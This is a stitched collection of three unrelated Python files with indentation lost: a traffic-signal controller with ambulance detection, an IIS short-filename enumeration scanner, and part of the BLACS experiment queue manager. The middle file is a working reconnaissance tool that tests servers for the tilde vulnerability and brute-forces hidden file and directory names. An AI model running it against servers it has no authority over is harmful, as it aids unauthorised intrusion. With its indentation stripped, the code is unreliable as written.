#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE03
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[3] == 1):
print("Emergency Vehicle Detected in Lane 4 ")
#gpio_lane 4
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
#LANE04
GPIO.output(23,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(19,1)
time.sleep(t[3])
GPIO.output(19,0)
GPIO.output(21,1)
time.sleep(2)
GPIO.output(21,0)
GPIO.output(23,1)
GPIO.output(23,1)
if(4==len(emergency)):
if(emergency[0] == 1):
print("Emergency Vehicle Detected in Lane 1")
#gpio_lane1
GPIO.output(40,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(36,1)
time.sleep(t[0])
GPIO.output(36,0)
GPIO.output(38,1)
time.sleep(2)
GPIO.output(38,0)
GPIO.output(40,1)
if(4==len(emergency)):
if(emergency[1] == 1):
print("Emergency Vehicle Detected in Lane 2")
#gpio_lane2
GPIO.output(12,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(8,1)
time.sleep(t[1])
GPIO.output(8,0)
GPIO.output(10,1)
time.sleep(2)
GPIO.output(10,0)
GPIO.output(12,1)
if(4==len(emergency)):
if(emergency[2] == 1):
print("Emergency Vehicle Detected in Lane 3")
#gpio_lane3
GPIO.output(15,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(11,1)
time.sleep(t[2])
GPIO.output(11,0)
GPIO.output(13,1)
time.sleep(2)
GPIO.output(13,0)
GPIO.output(15,1)
maxlimit.release()'''
lock.release()
@with_goto
def itms(lockg,emergency,count):
lockg.acquire()
print("GPIO THREADING BEGINS SOOOON")
print("-----------------------------------------------------------------")
# assign timings to array t
label .c
if(4==len(count)):
c=count
t = []
for l in range(4):
ti = (c[l] * 4) + 2
t.append(ti)
now = datetime.now()
three=threading.active_count()
print("")
print("Current time =", now)
print("")
table = PrettyTable([' ','Lane 1','Lane 2','Lane 3','Lane 4'])
table.add_row(['Vehicle Count', c[0],c[1],c[2],c[3]] )
table.add_row(['Green Signal Time', t[0],t[1],t[2],t[3]] )
print(table)
print("")
print("Total Active Thread = ", three)
print("")
if maxlimit.acquire():
z = threading.Thread(target=gpio, args=(lock,emergency,t))
z.start()
else:
goto .c
lockg.release()
def density():
print("LANE VEHICLE COUNTING BEGUN")
label_map = label_map_util.load_labelmap(PATH_TO_LABELS)
categories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)
category_index = label_map_util.create_category_index(categories)
def load_image_into_numpy_array(image):
(im_width, im_height) = image.size
return np.array(image.getdata()).reshape(
(im_height, im_width, 3)).astype(np.uint8)
# If you want to test the code with your images, just add path to the images to the TEST_IMAGE_PATHS.
PATH_TO_TEST_IMAGES_DIR = 'test'
TEST_IMAGE_PATHS = [os.path.join(PATH_TO_TEST_IMAGES_DIR, 'image{}.jpg'.format(i)) for i in range(1, 5)] # adjust range for # of images in folder
# Size, in inches, of the output images.
IMAGE_SIZE = (12, 8)
with detection_graph.as_default():
with tf.Session(graph=detection_graph) as sess:
count = []
emergency = []
i = 1
for image_path in TEST_IMAGE_PATHS:
image = Image.open(image_path)
labels = []
# the array based representation of the image will be used later in order to prepare the
# result image with boxes and labels on it.
image_np = load_image_into_numpy_array(image)
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = detection_graph.get_tensor_by_name('detection_scores:0')
classes = detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = detection_graph.get_tensor_by_name('num_detections:0')
# Actual detection.
(boxes, scores, classes, num_detections) = sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
np.squeeze(boxes),
np.squeeze(classes).astype(np.int32),
np.squeeze(scores),
category_index,
use_normalized_coordinates=True,
line_thickness=8)
classes = np.squeeze(classes).astype(np.int32)
def count_vehicle(scores):
final_score = np.squeeze(scores)
c = 0
for j in range(100):
if scores is None or final_score[j] > 0.5:
c = c + 1 #taking count of vehicles
return c
def em(scores):
e = 0
final_score = np.squeeze(scores)
for j in range(100):
if scores is None or final_score[j] > 0.5:
if classes[j] in category_index.keys():
labels.append(category_index[classes[j]]['name'])
if 'Emergency-AMBULANCE' in labels:
e = 1
else:
e = 0
return e
#plt.figure(figsize=IMAGE_SIZE)
plt.imshow(image_np) # matplotlib is configured for command line only so we save the outputs instead
plt.savefig("outputs/detection_output{}.png".format(i)) # create an outputs folder for the images to be saved
count.append(count_vehicle(scores))
emergency.append(em(scores))
i = i+1 # this was a quick fix for iteration, create a pull request if you'd like
y=threading.Thread(target=itms(lock,emergency,count))
y.start()
density()
if __name__ == '__main__':
x=Process(target=density)
x.start()
|
iiscan.py
|
#!/usr/bin/env python
# encoding:utf-8
# An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
import sys
import httplib
import urlparse
import threading
import Queue
import time
class Scanner():
def __init__(self, target):
self.target = target.lower()
if not self.target.startswith('http'):
self.target = 'http://%s' % self.target
self.scheme, self.netloc, self.path, params, query, fragment = \
urlparse.urlparse(target)
if self.path[-1:] != '/': # ends with slash
self.path += '/'
self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-'
self.files = []
self.dirs = []
self.queue = Queue.Queue()
self.lock = threading.Lock()
self.threads = []
self.request_method = ''
self.msg_queue = Queue.Queue()
self.STOP_ME = False
threading.Thread(target=self._print).start()
def _conn(self):
try:
if self.scheme == 'https':
conn = httplib.HTTPSConnection(self.netloc)
else:
conn = httplib.HTTPConnection(self.netloc)
return conn
except Exception, e:
print '[_conn.Exception]', e
return None
def _get_status(self, path):
try:
conn = self._conn()
conn.request(self.request_method, path)
status = conn.getresponse().status
conn.close()
return status
except Exception, e:
raise Exception('[_get_status.Exception] %s' % str(e) )
def is_vul(self):
try:
for _method in ['GET', 'OPTIONS']:
self.request_method = _method
status_1 = self._get_status(self.path + '/*~1*/a.aspx') # an existed file/folder
status_2 = self._get_status(self.path + '/l1j1e*~1*/a.aspx') # not existed file/folder
if status_1 == 404 and status_2 != 404:
return True
return False
except Exception, e:
raise Exception('[is_vul.Exception] %s' % str(e) )
def run(self):
for c in self.alphanum:
self.queue.put( (self.path + c, '.*') ) # filename, extension
for i in range(20):
t = threading.Thread(target=self._scan_worker)
self.threads.append(t)
t.start()
for t in self.threads:
t.join()
self.STOP_ME = True
def report(self):
print '-'* 64
for d in self.dirs:
print 'Dir: %s' % d
for f in self.files:
print 'File: %s' % f
print '-'*64
print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files))
print 'Note that * is a wildcard, matches any character zero or more times.'
def _print(self):
while not self.STOP_ME or (not self.msg_queue.empty()):
if self.msg_queue.empty():
time.sleep(0.05)
else:
print self.msg_queue.get()
def _scan_worker(self):
while True:
try:
url, ext = self.queue.get(timeout=1.0)
status = self._get_status(url + '*~1' + ext + '/1.aspx')
if status == 404:
self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext))
if len(url) - len(self.path)< 6: # enum first 6 chars only
for c in self.alphanum:
self.queue.put( (url + c, ext) )
else:
if ext == '.*':
self.queue.put( (url, '') )
if ext == '':
self.dirs.append(url + '~1')
self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]')
elif len(ext) == 5 or (not ext.endswith('*')): # .asp*
self.files.append(url + '~1' + ext)
self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]')
else:
for c in 'abcdefghijklmnopqrstuvwxyz0123456789':
self.queue.put( (url, ext[:-1] + c + '*') )
if len(ext) < 4: # < len('.as*')
self.queue.put( (url, ext[:-1] + c) )
except Queue.Empty,e:
break
except Exception, e:
print '[Exception]', e
if __name__ == '__main__':
if len(sys.argv) == 1:
print 'Usage: python IIS_shortname_Scan.py http://www.target.com/'
sys.exit()
target = sys.argv[1]
s = Scanner(target)
if not s.is_vul():
s.STOP_ME = True
print 'Server is not vulnerable'
sys.exit(0)
print 'Server is vulnerable, please wait, scanning...'
s.run()
s.report()
|
experiment_queue.py
|
#####################################################################
# #
# /experiment_queue.py #
# #
# Copyright 2013, Monash University #
# #
# This file is part of the program BLACS, in the labscript suite #
# (see http://labscriptsuite.org), and is licensed under the #
# Simplified BSD License. See the license.txt file in the root of #
# the project for the full license. #
# #
#####################################################################
from __future__ import division, unicode_literals, print_function, absolute_import
from labscript_utils import PY2
if PY2:
str = unicode
import Queue as queue
else:
import queue
import logging
import os
import platform
import threading
import time
import sys
import shutil
from collections import defaultdict
from tempfile import gettempdir
from binascii import hexlify
from qtutils.qt.QtCore import *
from qtutils.qt.QtGui import *
from qtutils.qt.QtWidgets import *
import zprocess
from labscript_utils.ls_zprocess import ProcessTree
process_tree = ProcessTree.instance()
import labscript_utils.h5_lock, h5py
from qtutils import *
from labscript_utils.qtwidgets.elide_label import elide_label
from labscript_utils.connections import ConnectionTable
import labscript_utils.properties
from blacs.tab_base_classes import MODE_MANUAL, MODE_TRANSITION_TO_BUFFERED, MODE_TRANSITION_TO_MANUAL, MODE_BUFFERED
import blacs.plugins as plugins
def tempfilename(prefix='BLACS-temp-', suffix='.h5'):
"""Return a filepath appropriate for use as a temporary file"""
random_hex = hexlify(os.urandom(16)).decode()
return os.path.join(gettempdir(), prefix + random_hex + suffix)
FILEPATH_COLUMN = 0
class QueueTreeview(QTreeView):
def __init__(self,*args,**kwargs):
QTreeView.__init__(self,*args,**kwargs)
self.header().setStretchLastSection(True)
self.setAutoScroll(False)
self.add_to_queue = None
self.delete_selection = None
self._logger = logging.getLogger('BLACS.QueueManager')
def keyPressEvent(self,event):
if event.key() == Qt.Key_Delete:
event.accept()
if self.delete_selection:
self.delete_selection()
QTreeView.keyPressEvent(self,event)
def dragEnterEvent(self, event):
if event.mimeData().hasUrls():
event.accept()
else:
event.ignore()
def dragMoveEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
else:
event.ignore()
def dropEvent(self, event):
if event.mimeData().hasUrls():
event.setDropAction(Qt.CopyAction)
event.accept()
for url in event.mimeData().urls():
path = str(url.toLocalFile())
if path.endswith('.h5') or path.endswith('.hdf5'):
self._logger.info('Acceptable file dropped. Path is %s'%path)
if self.add_to_queue:
self.add_to_queue(str(path))
else:
self._logger.info('Dropped file not added to queue because there is no access to the neccessary add_to_queue method')
else:
self._logger.info('Invalid file dropped. Path was %s'%path)
else:
event.ignore()
class QueueManager(object):
REPEAT_ALL = 0
REPEAT_LAST = 1
ICON_REPEAT = ':qtutils/fugue/arrow-repeat'
ICON_REPEAT_LAST = ':qtutils/fugue/arrow-repeat-once'
def __init__(self, BLACS, ui):
self._ui = ui
self.BLACS = BLACS
self.last_opened_shots_folder = BLACS.exp_config.get('paths', 'experiment_shot_storage')
self._manager_running = True
self._manager_paused = False
self._manager_repeat = False
self._manager_repeat_mode = self.REPEAT_ALL
self.master_pseudoclock = self.BLACS.connection_table.master_pseudoclock
self._logger = logging.getLogger('BLACS.QueueManager')
# Create listview model
self._model = QStandardItemModel()
self._create_headers()
self._ui.treeview.setModel(self._model)
self._ui.treeview.add_to_queue = self.process_request
self._ui.treeview.delete_selection = self._delete_selected_items
# set up buttons
self._ui.queue_pause_button.toggled.connect(self._toggle_pause)
self._ui.queue_repeat_button.toggled.connect(self._toggle_repeat)
self._ui.queue_delete_button.clicked.connect(self._delete_selected_items)
self._ui.queue_clear_button.clicked.connect(self._toggle_clear)
self._ui.actionAdd_to_queue.triggered.connect(self.on_add_shots_triggered)
self._ui.queue_add_button.setDefaultAction(self._ui.actionAdd_to_queue)
self._ui.queue_push_up.clicked.connect(self._move_up)
self._ui.queue_push_down.clicked.connect(self._move_down)
self._ui.queue_push_to_top.clicked.connect(self._move_top)
self._ui.queue_push_to_bottom.clicked.connect(self._move_bottom)
# Set the elision of the status labels:
elide_label(self._ui.queue_status, self._ui.queue_status_verticalLayout, Qt.ElideRight)
elide_label(self._ui.running_shot_name, self._ui.queue_status_verticalLayout, Qt.ElideLeft)
# Set up repeat mode button menu:
self.repeat_mode_menu = QMenu(self._ui)
self.action_repeat_all = QAction(QIcon(self.ICON_REPEAT), 'Repeat all', self._ui)
self.action_repeat_last = QAction(QIcon(self.ICON_REPEAT_LAST), 'Repeat last', self._ui)
self.action_repeat_all.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_ALL))
self.action_repeat_last.triggered.connect(lambda *args: setattr(self, 'manager_repeat_mode', self.REPEAT_LAST))
self.repeat_mode_menu.addAction(self.action_repeat_all)
self.repeat_mode_menu.addAction(self.action_repeat_last)
self._ui.repeat_mode_select_button.setMenu(self.repeat_mode_menu)
# The button already has an arrow indicating a menu, don't draw another one:
self._ui.repeat_mode_select_button.setStyleSheet("QToolButton::menu-indicator{width: 0;}")
self.manager = threading.Thread(target = self.manage)
self.manager.daemon=True
self.manager.start()
def _create_headers(self):
self._model.setHorizontalHeaderItem(FILEPATH_COLUMN, QStandardItem('Filepath'))
def get_save_data(self):
# get list of files in the queue
file_list = []
for i in range(self._model.rowCount()):
file_list.append(self._model.item(i).text())
# get button states
return {'manager_paused':self.manager_paused,
'manager_repeat':self.manager_repeat,
'manager_repeat_mode':self.manager_repeat_mode,
'files_queued':file_list,
'last_opened_shots_folder': self.last_opened_shots_folder
}
def restore_save_data(self,data):
if 'manager_paused' in data:
self.manager_paused = data['manager_paused']
if 'manager_repeat' in data:
self.manager_repeat = data['manager_repeat']
if 'manager_repeat_mode' in data:
self.manager_repeat_mode = data['manager_repeat_mode']
if 'files_queued' in data:
file_list = list(data['files_queued'])
self._model.clear()
self._create_headers()
for file in file_list:
self.process_request(str(file))
if 'last_opened_shots_folder' in data:
self.last_opened_shots_folder = data['last_opened_shots_folder']
@property
@inmain_decorator(True)
def manager_running(self):
return self._manager_running
@manager_running.setter
@inmain_decorator(True)
def manager_running(self,value):
value = bool(value)
self._manager_running = value
def _toggle_pause(self,checked):
self.manager_paused = checked
def _toggle_clear(self):
self._model.clear()
self._create_headers()
@property
@inmain_decorator(True)
def manager_paused(self):
return self._manager_paused
@manager_paused.setter
@inmain_decorator(True)
def manager_paused(self,value):
value = bool(value)
self._manager_paused = value
if value != self._ui.queue_pause_button.isChecked():
self._ui.queue_pause_button.setChecked(value)
def _toggle_repeat(self,checked):
self.manager_repeat = checked
@property
@inmain_decorator(True)
def manager_repeat(self):
return self._manager_repeat
@manager_repeat.setter
@inmain_decorator(True)
def manager_repeat(self,value):
value = bool(value)
self._manager_repeat = value
if value != self._ui.queue_repeat_button.isChecked():
self._ui.queue_repeat_button.setChecked(value)
@property
@inmain_decorator(True)
def manager_repeat_mode(self):
return self._manager_repeat_mode
@manager_repeat_mode.setter
@inmain_decorator(True)
def manager_repeat_mode(self, value):
assert value in [self.REPEAT_LAST, self.REPEAT_ALL]
self._manager_repeat_mode = value
button = self._ui.queue_repeat_button
if value == self.REPEAT_ALL:
button.setIcon(QIcon(self.ICON_REPEAT))
elif value == self.REPEAT_LAST:
button.setIcon(QIcon(self.ICON_REPEAT_LAST))
def on_add_shots_triggered(self):
shot_files = QFileDialog.getOpenFileNames(self._ui, 'Select shot files',
self.last_opened_shots_folder,
"HDF5 files (*.h5)")
if isinstance(shot_files, tuple):
shot_files, _ = shot_files
if not shot_files:
# User cancelled selection
return
# Convert to standard platform specific path, otherwise Qt likes forward slashes:
shot_files = [os.path.abspath(str(shot_file)) for shot_file in shot_files]
# Save the containing folder for use next time we open the dialog box:
self.last_opened_shots_folder = os.path.dirname(shot_files[0])
# Queue the files to be opened:
for filepath in shot_files:
if filepath.endswith('.h5'):
self.process_request(str(filepath))
def _delete_selected_items(self):
index_list = self._ui.treeview.selectedIndexes()
while index_list:
self._model.takeRow(index_list[0].row())
index_list = self._ui.treeview.selectedIndexes()
def _move_up(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
if row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
def _move_down(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row if it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
if row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
def _move_top(self):
# Get the selection model from the treeview
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in sorted(selection_model.selectedRows())]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not element 0, and the row above it is not selected
# (note that while a row above may have been initially selected, it should by now, be one row higher
# since we start moving elements of the list upwards starting from the lowest index)
while row > 0 and (row-1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row-1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] -= 1
row -= 1
def _move_bottom(self):
selection_model = self._ui.treeview.selectionModel()
# Create a list of select row indices
selected_row_list = [index.row() for index in reversed(sorted(selection_model.selectedRows()))]
# For each row selected
for i,row in enumerate(selected_row_list):
# only move the row while it is not the last element, and the row above it is not selected
# (note that while a row below may have been initially selected, it should by now, be one row lower
# since we start moving elements of the list upwards starting from the highest index)
while row < self._model.rowCount()-1 and (row+1) not in selected_row_list:
# Remove the selected row
items = self._model.takeRow(row)
# Add the selected row into a position one above
self._model.insertRow(row+1,items)
# Since it is now a newly inserted row, select it again
selection_model.select(self._model.indexFromItem(items[0]),QItemSelectionModel.SelectCurrent)
# reupdate the list of selected indices to reflect this change
selected_row_list[i] += 1
row += 1
@inmain_decorator(True)
def append(self, h5files):
for file in h5files:
item = QStandardItem(file)
item.setToolTip(file)
self._model.appendRow(item)
@inmain_decorator(True)
def prepend(self,h5file):
if not self.is_in_queue(h5file):
self._model.insertRow(0,QStandardItem(h5file))
def process_request(self,h5_filepath):
# check connection table
try:
new_conn = ConnectionTable(h5_filepath, logging_prefix='BLACS')
except Exception:
return "H5 file not accessible to Control PC\n"
result,error = inmain(self.BLACS.connection_table.compare_to,new_conn)
if result:
# Has this run file been run already?
with h5py.File(h5_filepath) as h5_file:
if 'data' in h5_file['/']:
rerun = True
else:
rerun = False
if rerun or self.is_in_queue(h5_filepath):
self._logger.debug('Run file has already been run! Creating a fresh copy to rerun')
new_h5_filepath, repeat_number = self.new_rep_name(h5_filepath)
# Keep counting up until we get a filename that isn't in the filesystem:
while os.path.exists(new_h5_filepath):
new_h5_filepath, repeat_number = self.new_rep_name(new_h5_filepath)
success = self.clean_h5_file(h5_filepath, new_h5_filepath, repeat_number=repeat_number)
if not success:
return 'Cannot create a re run of this experiment. Is it a valid run file?'
self.append([new_h5_filepath])
message = "Experiment added successfully: experiment to be re-run\n"
else:
self.append([h5_filepath])
message = "Experiment added successfully\n"
if self.manager_paused:
message += "Warning: Queue is currently paused\n"
if not self.manager_running:
message = "Error: Queue is not running\n"
return message
else:
# TODO: Parse and display the contents of "error" in a more human readable format for analysis of what is wrong!
message = ("Connection table of your file is not a subset of the experimental control apparatus.\n"
"You may have:\n"
" Submitted your file to the wrong control PC\n"
" Added new channels to your h5 file, without rewiring the experiment and updating the control PC\n"
" Renamed a channel at the top of your script\n"
" Submitted an old file, and the experiment has since been rewired\n"
"\n"
"Please verify your experiment script matches the current experiment configuration, and try again\n"
"The error was %s\n"%error)
return message
def new_rep_name(self, h5_filepath):
basename, ext = os.path.splitext(h5_filepath)
if '_rep' in basename and ext == '.h5':
reps = basename.split('_rep')[-1]
try:
reps = int(reps)
except ValueError:
# not a rep
pass
else:
return ''.join(basename.split('_rep')[:-1]) + '_rep%05d.h5' % (reps + 1), reps + 1
return basename + '_rep%05d.h5' % 1, 1
def clean_h5_file(self, h5file, new_h5_file, repeat_number=0):
try:
with h5py.File(h5file, 'r') as old_file:
with h5py.File(new_h5_file, 'w') as new_file:
groups_to_copy = [
'devices',
'calibrations',
'script',
'globals',
'connection table',
'labscriptlib',
'waits',
'time_markers',
'shot_properties',
]
for group in groups_to_copy:
if group in old_file:
new_file.copy(old_file[group], group)
for name in old_file.attrs:
new_file.attrs[name] = old_file.attrs[name]
new_file.attrs['run repeat'] = repeat_number
except Exception as e:
# raise
self._logger.exception('Clean H5 File Error.')
return False
return True
@inmain_decorator(wait_for_return=True)
def is_in_queue(self,path):
item = self._model.findItems(path,column=FILEPATH_COLUMN)
if item:
return True
else:
return False
@inmain_decorator(wait_for_return=True)
def set_status(self, queue_status, shot_filepath=None):
self._ui.queue_status.setText(str(queue_status))
if shot_filepath is not None:
self._ui.running_shot_name.setText('<b>%s</b>'% str(os.path.basename(shot_filepath)))
else:
self._ui.running_shot_name.setText('')
@inmain_decorator(wait_for_return=True)
def get_status(self):
return self._ui.queue_status.text()
@inmain_decorator(wait_for_return=True)
def get_next_file(self):
return str(self._model.takeRow(0)[0].text())
@inmain_decorator(wait_for_return=True)
def transition_device_to_buffered(self, name, transition_list, h5file, restart_receiver):
tab = self.BLACS.tablist[name]
if self.get_device_error_state(name,self.BLACS.tablist):
return False
tab.connect_restart_receiver(restart_receiver)
tab.transition_to_buffered(h5file,self.current_queue)
transition_list[name] = tab
return True
@inmain_decorator(wait_for_return=True)
def get_device_error_state(self,name,device_list):
return device_list[name].error_message
def manage(self):
logger = logging.getLogger('BLACS.queue_manager.thread')
process_tree.zlock_client.set_thread_name('queue_manager')
# While the program is running!
logger.info('starting')
# HDF5 prints lots of errors by default, for things that aren't
# actually errors. These are silenced on a per thread basis,
# and automatically silenced in the main thread when h5py is
# imported. So we'll silence them in this thread too:
h5py._errors.silence_errors()
# This name stores the queue currently being used to
# communicate with tabs, so that abort signals can be put
# to it when those tabs never respond and are restarted by
# the user.
self.current_queue = queue.Queue()
#TODO: put in general configuration
timeout_limit = 300 #seconds
self.set_status("Idle")
while self.manager_running:
# If the pause button is pushed in, sleep
if self.manager_paused:
if self.get_status() == "Idle":
logger.info('Paused')
self.set_status("Queue paused")
time.sleep(1)
continue
# Get the top file
try:
path = self.get_next_file()
self.set_status('Preparing shot...', path)
logger.info('Got a file: %s'%path)
except:
# If no files, sleep for 1s,
self.set_status("Idle")
time.sleep(1)
continue
devices_in_use = {}
transition_list = {}
self.current_queue = queue.Queue()
# Function to be run when abort button is clicked
def abort_function():
try:
# Set device name to "Queue Manager" which will never be a labscript device name
# as it is not a valid python variable name (has a space in it!)
self.current_queue.put(['Queue Manager', 'abort'])
except Exception:
logger.exception('Could not send abort message to the queue manager')
def restart_function(device_name):
try:
self.current_queue.put([device_name, 'restart'])
except Exception:
logger.exception('Could not send restart message to the queue manager for device %s'%device_name)
##########################################################################################################################################
# transition to buffered #
##########################################################################################################################################
try:
# A Queue for event-based notification when the tabs have
# completed transitioning to buffered:
timed_out = False
error_condition = False
abort = False
restarted = False
self.set_status("Transitioning to buffered...", path)
# Enable abort button, and link in current_queue:
inmain(self._ui.queue_abort_button.clicked.connect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,True)
##########################################################################################################################################
# Plugin callbacks #
##########################################################################################################################################
for callback in plugins.get_callbacks('pre_transition_to_buffered'):
try:
callback(path)
except Exception:
logger.exception("Plugin callback raised an exception")
start_time = time.time()
with h5py.File(path, 'r') as hdf5_file:
devices_in_use = {}
start_order = {}
stop_order = {}
for name in hdf5_file['devices']:
device_properties = labscript_utils.properties.get(
hdf5_file, name, 'device_properties'
)
devices_in_use[name] = self.BLACS.tablist[name]
start_order[name] = device_properties.get('start_order', None)
stop_order[name] = device_properties.get('start_order', None)
# Sort the devices into groups based on their start_order and stop_order
start_groups = defaultdict(set)
stop_groups = defaultdict(set)
for name in devices_in_use:
start_groups[start_order[name]].add(name)
stop_groups[stop_order[name]].add(name)
while (transition_list or start_groups) and not error_condition:
if not transition_list:
# Ready to transition the next group:
for name in start_groups.pop(min(start_groups)):
try:
# Connect restart signal from tabs to current_queue and transition the device to buffered mode
success = self.transition_device_to_buffered(name,transition_list,path,restart_function)
if not success:
logger.error('%s has an error condition, aborting run' % name)
error_condition = True
break
except Exception as e:
logger.exception('Exception while transitioning %s to buffered mode.'%(name))
error_condition = True
break
if error_condition:
break
try:
# Wait for a device to transtition_to_buffered:
logger.debug('Waiting for the following devices to finish transitioning to buffered mode: %s'%str(transition_list))
device_name, result = self.current_queue.get(timeout=2)
#Handle abort button signal
if device_name == 'Queue Manager' and result == 'abort':
# we should abort the run
logger.info('abort signal received from GUI')
abort = True
break
if result == 'fail':
logger.info('abort signal received during transition to buffered of %s' % device_name)
error_condition = True
break
elif result == 'restart':
logger.info('Device %s was restarted, aborting shot.'%device_name)
restarted = True
break
logger.debug('%s finished transitioning to buffered mode' % device_name)
# The tab says it's done, but does it have an error condition?
if self.get_device_error_state(device_name,transition_list):
logger.error('%s has an error condition, aborting run' % device_name)
error_condition = True
break
del transition_list[device_name]
except queue.Empty:
# It's been 2 seconds without a device finishing
# transitioning to buffered. Is there an error?
for name in transition_list:
if self.get_device_error_state(name,transition_list):
error_condition = True
break
if error_condition:
break
# Has programming timed out?
if time.time() - start_time > timeout_limit:
logger.error('Transitioning to buffered mode timed out')
timed_out = True
break
# Handle if we broke out of loop due to timeout or error:
if timed_out or error_condition or abort or restarted:
# Pause the queue, re add the path to the top of the queue, and set a status message!
# only if we aren't responding to an abort click
if not abort:
self.manager_paused = True
self.prepend(path)
if timed_out:
self.set_status("Programming timed out\nQueue paused")
elif abort:
self.set_status("Aborted")
elif restarted:
self.set_status("Device restarted in transition to\nbuffered. Aborted. Queue paused.")
else:
self.set_status("Device(s) in error state\nQueue Paused")
# Abort the run for all devices in use:
# need to recreate the queue here because we don't want to hear from devices that are still transitioning to buffered mode
self.current_queue = queue.Queue()
for tab in devices_in_use.values():
# We call abort buffered here, because if each tab is either in mode=BUFFERED or transition_to_buffered failed in which case
# it should have called abort_transition_to_buffered itself and returned to manual mode
# Since abort buffered will only run in mode=BUFFERED, and the state is not queued indefinitely (aka it is deleted if we are not in mode=BUFFERED)
# this is the correct method call to make for either case
tab.abort_buffered(self.current_queue)
# We don't need to check the results of this function call because it will either be successful, or raise a visible error in the tab.
# disconnect restart signal from tabs
inmain(tab.disconnect_restart_receiver,restart_function)
# disconnect abort button and disable
inmain(self._ui.queue_abort_button.clicked.disconnect,abort_function)
inmain(self._ui.queue_abort_button.setEnabled,False)
# Start a new iteration
continue
##########################################################################################################################################
# SCIENCE! #
##########################################################################################################################################
# Get front panel data, but don't save it to the h5 file until the experiment ends:
states,tab_positions,window_data,plugin_data = self.BLACS.front_panel_settings.get_save_data()
self.set_status("Running (program time: %.3fs)..."%(time.time() - start_time), path)
